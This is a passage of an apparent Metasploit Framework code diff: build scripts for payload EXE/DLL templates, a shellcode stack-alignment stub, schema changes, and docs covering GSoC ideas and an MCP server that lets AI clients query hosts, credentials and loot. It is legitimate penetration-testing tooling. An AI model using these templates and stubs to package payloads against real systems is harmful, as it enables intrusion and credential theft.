# the first arch's toolchain and produces wrong-architecture binaries.
foreach ($v in 'VSCMD_VER', 'VSCMD_ARG_TGT_ARCH', 'VSCMD_ARG_HOST_ARCH') {
[System.Environment]::SetEnvironmentVariable($v, $null, 'Process')
}
$vcvars = Join-Path $env:VCINSTALLDIR 'Auxiliary\Build\vcvarsall.bat'
cmd /c "`"$vcvars`" $Arch >nul 2>&1 && set" 2>&1 | ForEach-Object {
if ($_ -match '^([^=]+)=(.*)$') {
[System.Environment]::SetEnvironmentVariable($matches[1], $matches[2], 'Process')
}
}
}
function Invoke-Cl {
param(
[string[]]$ClFlags,
[string]$Source,
[string]$OutputName,
[string[]]$LinkLibs,
[string]$LinkRes,
[string]$EntryPoint,
[switch]$NoDefaultLib
)
$clArgs = $ClFlags + @($Source, "/Fe:$OutputName", '/link') + $LinkLibs
if ($LinkRes) { $clArgs += $LinkRes }
$clArgs += @("/entry:$EntryPoint", '/subsystem:WINDOWS')
if ($NoDefaultLib) { $clArgs += '/NODEFAULTLIB' }
& cl @clArgs
if ($LASTEXITCODE -ne 0) { Write-Error "cl failed for $OutputName" }
}
function Set-PEVersion {
param(
[string]$Path,
[int]$Major,
[int]$Minor
)
$bytes = [System.IO.File]::ReadAllBytes($Path)
$peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
if ([System.Text.Encoding]::ASCII.GetString($bytes, $peOffset, 4) -ne "PE`0`0") {
Write-Error "$Path is not a valid PE file"
return
}
# PE optional header starts at peOffset + 24. Field offsets from its start:
# +40: MajorOperatingSystemVersion (uint16)
# +42: MinorOperatingSystemVersion (uint16)
# +48: MajorSubsystemVersion (uint16)
# +50: MinorSubsystemVersion (uint16)
# These offsets are identical for PE32 and PE32+.
$opt = $peOffset + 24
$verBytes = [BitConverter]::GetBytes([uint16]$Major)
$minBytes = [BitConverter]::GetBytes([uint16]$Minor)
$bytes[$opt + 40] = $verBytes[0]; $bytes[$opt + 41] = $verBytes[1]
$bytes[$opt + 42] = $minBytes[0]; $bytes[$opt + 43] = $minBytes[1]
$bytes[$opt + 48] = $verBytes[0]; $bytes[$opt + 49] = $verBytes[1]
$bytes[$opt + 50] = $minBytes[0]; $bytes[$opt + 51] = $minBytes[1]
[System.IO.File]::WriteAllBytes($Path, $bytes)
Write-Host " Patched OS and subsystem version to ${Major}.${Minor}"
}
function Build-Template {
param([string]$Arch, [string]$Name)
$def = $BuildDefs[$Name]
Push-Location (Join-Path $ScriptDir $def.Dir)
try {
if ($def.RcArgs) {
& rc @($def.RcArgs)
if ($LASTEXITCODE -ne 0) { throw "rc failed for $Name ($Arch)" }
}
$outName = $def.OutputFmt -f $Arch
Invoke-Cl -ClFlags $def.ClFlags -Source $def.Source -OutputName $outName `
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
if ($Name -like 'dll*') {
$outName256 = $outName -replace '(\.\w+)$', '.256kib$1'
Invoke-Cl -ClFlags ($def.ClFlags + '/DSCSIZE=262144') -Source $def.Source -OutputName $outName256 `
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
}
} finally { Pop-Location }
if ($def.PatchVersion) {
$outPath = Join-Path $ScriptDir "$($def.Dir)\$outName"
if ($Arch -eq 'x86') {
Set-PEVersion -Path $outPath -Major 4 -Minor 0
} else {
Set-PEVersion -Path $outPath -Major 5 -Minor 2
}
}
}
# Build each requested template for each architecture
foreach ($arch in $Architectures) {
Write-Host "`n=== Configuring for $arch ===" -ForegroundColor Cyan
Invoke-VCVars $arch
foreach ($tmpl in $Templates) {
Write-Host "`nBuilding: $tmpl ($arch)" -ForegroundColor Green
Build-Template -Arch $arch -Name $tmpl
}
}
# Clean intermediate files and move outputs
Write-Host "`n=== Cleaning up ===" -ForegroundColor Cyan
Get-ChildItem $ScriptDir -Recurse -File |
Where-Object { $_.Extension -in '.obj', '.res', '.exp', '.lib' } |
Remove-Item -Force
Write-Host "`n=== Moving outputs to $OutputDir ===" -ForegroundColor Cyan
Get-ChildItem $ScriptDir -Recurse -File |
Where-Object { $_.Extension -in '.exe', '.dll' } |
ForEach-Object {
Move-Item $_.FullName (Join-Path $OutputDir $_.Name) -Force
Write-Host " $($_.Name)"
}
Write-Host "`nDone." -ForegroundColor Green
-15
View File
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v template.rc
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.dll ..\..\..
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v /fo template.res ../dll/template.rc
cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.exp *.lib *.res *.obj
move *.dll ..\..\..
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj
move *.dll ..\..\..
-13
View File
@@ -1,13 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.exe ..\..\..
@@ -1,13 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.exe ..\..\..
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,48 +0,0 @@
/*
* This code is provided under the 3-clause BSD license below.
* ***********************************************************
*
* Copyright (c) 2013, Matthew Graeber
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
*
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause
; Syntax: MASM
; Build Syntax: ml64 /c /Cx AdjustStack.asm
; Output: AdjustStack.obj
; Notes: I really wanted to avoid having this external dependency but I couldnt
; come up with any other way to guarantee 16-byte stack alignment in 64-bit
; shellcode written in C.
extern ExecutePayload
global AlignRSP ; Marking AlignRSP as PUBLIC allows for the function
; to be called as an extern in our C code.
segment .text
; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
; to calling the entry point of the payload. This is necessary because 64-bit functions
; in Windows assume that they were called with 16-byte stack alignment. When amd64
; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
; alignment.
AlignRSP:
push rsi ; Preserve RSI since were stomping on it
mov rsi, rsp ; Save the value of RSP so it can be restored
and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
sub rsp, 020h ; Allocate homing space for ExecutePayload
call ExecutePayload ; Call the entry point of the payload
mov rsp, rsi ; Restore the original value of RSP
pop rsi ; Restore RSI
ret ; Return to caller
@@ -1,9 +0,0 @@
ENTRY(_ExecutePayload)
SECTIONS
{
.text :
{
*(.text.ExecutePayload)
}
}
@@ -1,11 +0,0 @@
ENTRY(AlignRSP)
SECTIONS
{
.text :
{
*(.text.AlignRSP)
*(.text.ExecutePayload)
*(.text.GetProcAddressWithHash)
}
}
+27141 -4059
View File
File diff suppressed because it is too large Load Diff
+26 -2
View File
@@ -10,7 +10,7 @@
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
ActiveRecord::Schema[7.2].define(version: 2026_04_11_000000) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
@@ -521,6 +521,16 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.string "netmask"
end
create_table "service_links", force: :cascade do |t|
t.bigint "parent_id", null: false
t.bigint "child_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["child_id"], name: "index_service_links_on_child_id"
t.index ["parent_id", "child_id"], name: "index_service_links_on_parent_id_and_child_id", unique: true
t.index ["parent_id"], name: "index_service_links_on_parent_id"
end
create_table "services", id: :serial, force: :cascade do |t|
t.integer "host_id"
t.datetime "created_at", precision: nil
@@ -530,7 +540,8 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.string "name"
t.datetime "updated_at", precision: nil
t.text "info"
t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
t.jsonb "resource", default: {}, null: false
t.index ["host_id", "port", "proto", "name", "resource"], name: "index_services_on_5_columns", unique: true
t.index ["name"], name: "index_services_on_name"
t.index ["port"], name: "index_services_on_port"
t.index ["proto"], name: "index_services_on_proto"
@@ -565,6 +576,12 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
end
create_table "sessions_tags", force: :cascade do |t|
t.integer "session_id"
t.integer "tag_id"
t.index ["session_id", "tag_id"], name: "index_sessions_tags_on_session_id_and_tag_id", unique: true
end
create_table "tags", id: :serial, force: :cascade do |t|
t.integer "user_id"
t.string "name", limit: 1024
@@ -635,6 +652,7 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.string "company"
t.string "prefs", limit: 524288
t.boolean "admin", default: true, null: false
t.boolean "sso_enabled", default: false, null: false
end
create_table "vuln_attempts", id: :serial, force: :cascade do |t|
@@ -647,6 +665,8 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.integer "session_id"
t.integer "loot_id"
t.text "fail_detail"
t.string "check_code"
t.text "check_detail"
end
create_table "vuln_details", id: :serial, force: :cascade do |t|
@@ -686,6 +706,7 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.integer "vuln_attempt_count", default: 0
t.integer "origin_id"
t.string "origin_type"
t.jsonb "resource", default: {}, null: false
t.index ["name"], name: "index_vulns_on_name"
t.index ["origin_id"], name: "index_vulns_on_origin_id"
end
@@ -803,4 +824,7 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
t.boolean "limit_to_network", default: false, null: false
t.boolean "import_fingerprint", default: false
end
add_foreign_key "service_links", "services", column: "child_id"
add_foreign_key "service_links", "services", column: "parent_id"
end
+3 -1
View File
@@ -4,6 +4,8 @@ This folder maintains the docs for https://docs.metasploit.com/ and https://gith
## Architecture
This section explains how the documentation site is generated and deployed.
How it works:
- `build.rb` - The main entry point for generating the docs site from the old Github Wiki format files within `metasploit-framework.wiki/`
@@ -11,7 +13,7 @@ How it works:
- `metasploit-framework.wiki/` - The raw markdown documentation files. Modify these files when updating the site. These files originally came from https://github.com/rapid7/metasploit-framework/wiki
- `metasploit-framework.wiki.old/` - A separate clone of https://github.com/rapid7/metasploit-framework/wiki
Behind the scenes these docs are built and deployed to https://docs.metasploit.com/
Behind the scenes, these docs are built and deployed to https://docs.metasploit.com/
### Adding pages
@@ -0,0 +1,89 @@
GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
Mentors: [@jheysel-r7](https://github.com/jheysel-r7)
Co-mentors: [@zeroSteiner](https://github.com/zeroSteiner) [@h00die](https://github.com/h00die)
Slack Contacts: @jheysel, @zeroSteiner and @h00die on [Metasploit Slack](https://metasploit.slack.com/)
For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors
using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response,
however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email
`msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
## Enhance Metasploit Framework
### CertificateTrace and KerberosTicketTrace Support
Kerberos and certificate-based authentication mechanisms are becoming increasingly prevalent across modern environments,
particularly in Active Directory and enterprise deployments. As a result, Metasploit modules that interact with these
authentication flows often require operators and developers to inspect Kerberos tickets or certificate material in order
to understand behavior, troubleshoot failures, or validate exploitation techniques. Today, this inspection typically
requires switching to separate auxiliary modules or exporting artifacts (such as .pfx files) for analysis with external
tooling, which interrupts the normal workflow.
This project would introduce CertificateTrace and KerberosTicketTrace functionality to Metasploit, allowing relevant
authentication artifacts to be captured and inspected as part of module execution. Similar in concept to the existing
HttpTrace capability, these traces would focus specifically on certificate and Kerberos-based authentication, decoding
and presenting useful metadata in a consistent, operator-friendly format. Similar to HttpTrace and HttpTraceHeadersOnly,
we would expect there to be support for different levels of logging, ex: print only the Certificate Signing Request (CSR).
Mentors: @jheysel-r7, @zeroSteiner
Size: 175 hrs
Difficulty: Medium
Required Skills: Understanding of how Kerberos and certificate-based authentication work; ability to write and deliver Ruby code.
Preferred Skills: Experience working with or using Kerberos and/or certificate-based authentication.
### Automated Vulnerable Environment Provisioning (build_vuln)
Many Metasploit modules—particularly those targeting web applications or open source software—include documentation
describing how to build a vulnerable test environment, and some provide vulnerable container images to simplify this
process. However, this information is typically maintained in module documentation and requires users to manually build
and start the environment outside of Metasploit, making module verification more time-consuming and inconsistent.
This project proposes a new Metasploit command (for example, build_vuln) that automates launching a vulnerable
environment for a given exploit module. Vulnerable environments would be defined using Open Container Initiative
(OCI)compliant configurations and designed to work with both Podman and Docker, with rootless execution.
The goal of this project is to automate setup steps that are already documented today, making it easier for users to
test exploits locally and for contributors and Rapid7 engineers to verify module behavior in a repeatable,
well-defined environment. This project would include refactoring existing modules to leverage the new functionality
where possible (docker-compose files already exist), as well as creating new vulnerable environment definitions for
popular modules that lack them today.
Mentors: @jheysel-r7, @h00die
Size: 360 hrs
Difficulty: Medium
Required Skills: Understanding of how containers work in the context of the Open Container Initiative; ability to write and deliver Ruby code.
Preferred Skills: Experience using containers; understanding of container definitions and best practices.
## Submit your own
If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the
`#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
## AI Usage Policy
We understand that AI aided development seems to be the future and we have no strong opposition towards GSoC contributors using
AI, responsibly. All code submitted for review must be both understood and tested successfully by the contributor and testing output or
proof of working functionality must be included in the PR description.
### Note on AI
Beware that although AI can be a powerful tool, it often generates more code than is needed and has the tendency to
rewrite library functionality that has already been implemented in the Metasploit-Framework. The best way to learn how
to do something in Framework is to traverse the code base, study modules which follow similar exploit paths and if you
have questions you can always ask in [Slack](https://metasploit.com/slack). At its current maturity level AI is great for helping with smaller tasks.
For example, if you are new to writing Ruby code, ask how to parse a hash and iterate over both the keys and values,
and it will likely be very helpful. Larger tasks, it will struggle with. For example, if you ask “I would like you to
write a Metasploit module for this CVE / PoC” it will generate lots of code (aka slop) that will not run. PRs submitted
that do not work and have clearly been AI generated will not be reviewed and repeated offenders will have disciplinary action applied.
@@ -2,21 +2,18 @@
Before submitting to the GSoC website, it is also helpful to solicit proposal feedback. This can be done by reaching out to us on our Slack at <https://metasploit.com/slack> via the `#gsoc` channel, or via sending an email to `msfdev [@] metasploit [dot] com`. If you don't hear back right away on a proposal, don't give up! Contributors may be busy, or you may need to try again to get someone's attention (but don't spam).
# 2022 Timeline
# 2026 Timeline
An updated list of the application timeline can be found at https://developers.google.com/open-source/gsoc/timeline. Please refer to this link for any updates that Google may make, as they have been known to change the timeline for certain dates in the past.
## Important Dates
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
- Accepted applications announced: May 20th at 1800 UTC
- Programming Starts: June 13th.
- GSoC Applications Open: March 16th at 18:00 UTC
- GSoC Applications Close: March 31th at 1800 UTC for 2026 GSoC applications
- Accepted GSoC contributor projects announced: April 30th at 1800 UTC
- Programming Starts: May 25th.
## Important Changes for 2022
- All submissions (including both draft submissions and final submissions) must be in PDF format when being submitted to GSoC's website. If you would like us to review your submission prior to the final deadline, please submit a Google Drive link to your DOC formatted proposal to msfdev [AT] metasploit [DOT] com and make sure that you have enabled commenting so that potential mentors can provide feedback.
# 2022 Idea List
You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.
# 2026 Idea List
You can find the current list of GSoC ideas at [[GSoC-2026-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.
# Getting started
Students interesting in GSoC, can start by reading Google's official guides.
@@ -81,14 +81,17 @@ Any object passed to `cookie` that isn't an instance of HttpCookieJar will have
----
Module authors can also pass an instance of `HttpCookieJar` with the `cookie` option:
Module authors can also pass an instance of `HttpCookieJar` with the `cookie` option.
Important: Cookies added to a `HttpCookieJar` must have both `domain` and `path` set, and cookie values must be strings. Without these attributes the underlying cookie store will raise an `ArgumentError`.
```ruby
cj = Msf::Exploit::Remote::HTTP::HttpCookieJar.new
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('PHPSESSID', @phpsessid))
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('AsWebStatisticsCooKie', 1))
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('shellinaboxCooKie', 1))
target_host = datastore['RHOST']
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('PHPSESSID', @phpsessid, domain: target_host, path: '/'))
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('AsWebStatisticsCooKie', '1', domain: target_host, path: '/'))
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('shellinaboxCooKie', '1', domain: target_host, path: '/'))
res = send_request_cgi({
'method' => 'GET',
@@ -64,7 +64,7 @@ Consider the following example as your HTML response:
<div id="french">Bonjour</div>
</div>
</body>
<html>
</html>
```
**Basic usage of #at**
@@ -0,0 +1,366 @@
The Metasploit MCP Server (`msfmcpd`) provides AI applications with secure, structured access to Metasploit Framework data through the [Model Context Protocol](https://modelcontextprotocol.io/) (MCP). It acts as a middleware layer between AI clients (such as Claude, Cursor, or custom agents) and Metasploit, exposing 8 standardized tools for querying reconnaissance data and searching modules.
This initial implementation is **read-only**. Only tools that query data (modules, hosts, services, vulnerabilities, etc.) are available. Tools for module execution, session interaction, and database modifications will be added in a future iteration.
## Architecture
```mermaid
flowchart TD
ai_app["AI Application<br>(Claude, Cursor, etc.)"]
subgraph msfmcp_server["MsfMcp Server"]
mcp_layer["MCP Layer (8 Tools)<br>Input Validation / Rate Limiting / Response Transformation"]
rpc_manager["RPC Manager<br>Auto-detect / Auto-start / Lifecycle Management"]
api_client["Metasploit API Client<br>MessagePack RPC (port 55553) / JSON-RPC (port 8081)<br>Session Management"]
mcp_layer --> rpc_manager
rpc_manager --> api_client
end
msf["Metasploit Framework<br>(msfrpcd)"]
ai_app -- "MCP Protocol (stdio or HTTP)<br>JSON-RPC 2.0" --> mcp_layer
api_client -- "HTTP/HTTPS" --> msf
```
## Quick Start
The simplest way to start the MCP server is with no arguments:
```
./msfmcpd
```
The server automatically detects whether a Metasploit RPC server is already running on the configured port. If not, it starts one automatically with randomly generated credentials.
To use specific credentials:
```
./msfmcpd --user your_username --password your_password
```
## Configuration
### Configuration File
Copy the example configuration and edit it:
```
cp config/mcp_config.yaml.example config/mcp_config.yaml
```
A MessagePack RPC configuration looks like this:
```yaml
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true
mcp:
transport: stdio
rate_limit:
enabled: true
requests_per_minute: 60
burst_size: 10
logging:
enabled: false
level: INFO
log_file: msfmcp.log
```
For JSON-RPC with bearer token authentication, use the JSON-RPC example instead:
```
cp config/mcp_config_jsonrpc.yaml.example config/mcp_config.yaml
```
### Command-Line Options
```
./msfmcpd --help
Options:
--config PATH Path to configuration file
--enable-logging Enable file logging with sanitization
--log-file PATH Log file path (overrides config file)
--user USER MSF API username (for MessagePack auth)
--password PASS MSF API password (for MessagePack auth)
--no-auto-start-rpc Disable automatic RPC server startup
--mcp-transport TRANSPORT MCP server transport type ('stdio' or 'http')
-h, --help Show this help message
-v, --version Show version information
```
### Environment Variable Overrides
All configuration settings can be overridden by environment variables:
| Variable | Description |
|---|---|
| `MSF_API_TYPE` | Connection type (`messagepack` or `json-rpc`) |
| `MSF_API_HOST` | Metasploit RPC API host |
| `MSF_API_PORT` | Metasploit RPC API port |
| `MSF_API_SSL` | Use SSL for Metasploit RPC API (`true` or `false`) |
| `MSF_API_ENDPOINT` | Metasploit RPC API endpoint |
| `MSF_API_USER` | RPC API username (for MessagePack auth) |
| `MSF_API_PASSWORD` | RPC API password (for MessagePack auth) |
| `MSF_API_TOKEN` | RPC API token (for JSON-RPC auth) |
| `MSF_AUTO_START_RPC` | Auto-start RPC server (`true` or `false`) |
| `MSF_MCP_TRANSPORT` | MCP transport type (`stdio` or `http`) |
| `MSF_MCP_HOST` | MCP server host (for HTTP transport) |
| `MSF_MCP_PORT` | MCP server port (for HTTP transport) |
Example using environment variables:
```
MSF_API_HOST=192.168.33.44 ./msfmcpd --config ./config/mcp_config.yaml
```
## Automatic RPC Server Management
When using MessagePack RPC on localhost, the MCP server can automatically manage the Metasploit RPC server lifecycle. This is enabled by default.
### How It Works
1. **Detection**: On startup, the MCP server probes the configured RPC port to check if a server is already running.
2. **Auto-start**: If no server is detected, it spawns the `msfrpcd` executable as a child process.
3. **Credentials**: If no username and password are provided, random credentials are generated automatically and used for both the RPC server and client authentication.
4. **Wait**: After starting, it polls the port until the RPC server becomes available (timeout: 30 seconds).
5. **Shutdown**: When the MCP server shuts down (via Ctrl+C or SIGTERM), it cleans up the managed RPC process.
**Note**: If an RPC server is already running, credentials must be provided via `--user`/`--password`, config file, or environment variables to authenticate with it.
### Database Support
The auto-started RPC server creates a framework instance with database support enabled by default. If the database is not running when the RPC server starts, a warning is displayed:
```
[WARNING] Database is not available. Some MCP tools that rely on the database will not work.
[WARNING] Start the database and restart the MCP server to enable full functionality.
```
Tools that query the database (`msf_host_info`, `msf_service_info`, `msf_vulnerability_info`, `msf_note_info`, `msf_credential_info`, `msf_loot_info`) require a running database. To initialize and start the database:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Disabling Auto-Start
Auto-start can be disabled in three ways:
- CLI flag: `--no-auto-start-rpc`
- Config file: `auto_start_rpc: false` in the `msf_api` section
- Environment variable: `MSF_AUTO_START_RPC=false`
Auto-start is also not available when:
- The API type is `json-rpc` (requires SSL certificates and a web server)
- The host is a remote address (cannot start a server on a remote machine)
When auto-start is disabled and no RPC server is running, you must start `msfrpcd` manually:
```
msfrpcd -U your_username -P your_password -p 55553
```
## MCP Tools
The server exposes 8 tools to AI applications via the MCP protocol.
### msf_search_modules
Search for Metasploit modules by keywords, CVE IDs, or module names.
- `query` (string, required): Search terms (e.g., `windows smb`, `CVE-2017-0144`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_module_info
Get detailed information about a specific Metasploit module.
- `type` (string, required): Module type (`exploit`, `auxiliary`, `post`, `payload`, `encoder`, `nop`)
- `name` (string, required): Module path (e.g., `windows/smb/ms17_010_eternalblue`)
Returns complete module details including options, targets, references, and authors.
### msf_host_info
Query discovered hosts from the Metasploit database.
- `workspace` (string, optional): Workspace name (default: `default`)
- `addresses` (string, optional): Filter by IP/CIDR (e.g., `192.168.1.0/24`)
- `only_up` (boolean, optional): Only return alive hosts (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_service_info
Query discovered services on hosts.
- `workspace` (string, optional): Workspace name
- `names` (string, optional): Filter by service names, comma-separated (e.g., `http`, `ldap,ssh`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range (e.g., `80,443` or `1-1024`)
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `only_up` (boolean, optional): Only return running services (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_vulnerability_info
Query discovered vulnerabilities.
- `workspace` (string, optional): Workspace name
- `names` (array of strings, optional): Filter by vulnerability names (exact, case-sensitive module names)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_note_info
Query notes stored in the database.
- `workspace` (string, optional): Workspace name
- `type` (string, optional): Filter by note type (e.g., `ssl.certificate`, `smb.fingerprint`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_credential_info
Query discovered credentials.
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_loot_info
Query collected loot (files, data dumps).
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
## Integration with AI Applications
Add the MCP server to your AI application configuration. The exact format depends on the client.
### Claude Desktop / Cursor
```json
{
"mcpServers": {
"metasploit": {
"command": "/path/to/metasploit-framework/msfmcpd",
"args": [
"--config",
"/path/to/config/mcp_config.yaml"
],
"env": {}
}
}
}
```
### Using RVM
If you use RVM to manage Ruby versions, specify the full path to RVM so the correct Ruby and gemset are used:
```json
{
"mcpServers": {
"metasploit": {
"command": "/your/home_dir/.rvm/bin/rvm",
"args": [
"in",
"/path/to/metasploit-framework",
"do",
"./msfmcpd",
"--config",
"config/mcp_config.yaml"
]
}
}
}
```
## Security Considerations
### Input Validation
All tool parameters are validated against strict JSON schemas. IP addresses are validated using Ruby's `IPAddr` class with CIDR support, workspace names are restricted to alphanumeric characters plus underscore/hyphen, port ranges are validated (1-65535), and search queries are limited to 500 characters.
### Credential Management
Configuration files should use `chmod 600` permissions. Credentials are transmitted securely to the Metasploit Framework API and are never cached or logged by the MCP server.
### Rate Limiting
